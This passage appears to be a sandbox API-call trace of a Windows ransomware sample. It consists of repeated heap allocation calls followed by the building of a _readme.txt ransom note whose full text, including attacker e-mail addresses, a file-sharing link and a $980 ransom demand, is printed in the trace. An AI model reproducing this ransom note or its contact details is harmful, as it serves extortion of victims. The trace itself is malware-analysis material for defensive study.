Size=0x860) returned 0x3a83058 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.635] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.635] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.636] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.636] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.637] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.637] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.638] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.638] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.639] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.639] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.640] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.640] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.641] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.641] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.642] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.642] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.643] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.643] PathFindFileNameW (pszPath="C:\\Boot\\en-US\\") returned="en-US\\" [0209.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.643] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.643] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.643] PathFindFileNameW (pszPath="") returned="" [0209.643] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.643] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.644] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.644] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x800) returned 0x3a83058 [0209.644] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.644] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x810) returned 0x32d9428 [0209.644] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.644] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.644] PathAppendW (in: pszPath="C:\\Boot\\en-US\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\en-US\\_readme.txt") returned 1 [0209.644] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.644] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.644] PathFileExistsW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned 0 [0209.646] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x7d00) returned 0x3a87060 [0209.646] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.646] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal 